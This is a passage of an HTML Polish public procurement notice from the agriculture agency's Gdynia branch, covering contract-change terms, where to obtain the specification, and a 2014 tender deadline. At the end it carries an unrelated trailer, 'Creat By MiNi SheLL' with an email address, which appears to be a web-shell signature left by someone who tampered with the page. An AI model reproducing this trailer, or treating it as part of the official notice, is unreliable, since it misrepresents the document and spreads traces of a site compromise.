<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza możliwość takiej  zmiany w następujących przypadkach:
1) termin wykonania zamówienia, w sytuacji uzależnionej od  administratora obiektu, 
2) ustawowej zmiany stawki podatku VAT.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.arimr.gov.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Agencja Restrukturyzacji i Modernizacji Rolnictwa - Pomorski Oddział Regionalny, ul.Kołłątaja 1, 81-332 Gdynia, pokój 316.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 17.10.2014 godzina 10:00, miejsce: Agencja Restrukturyzacji i Modernizacji Rolnictwa - Pomorski Oddział Regionalny, ul.Kołłątaja 1, 81-332 Gdynia, pokój 230 (kancelaria)..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com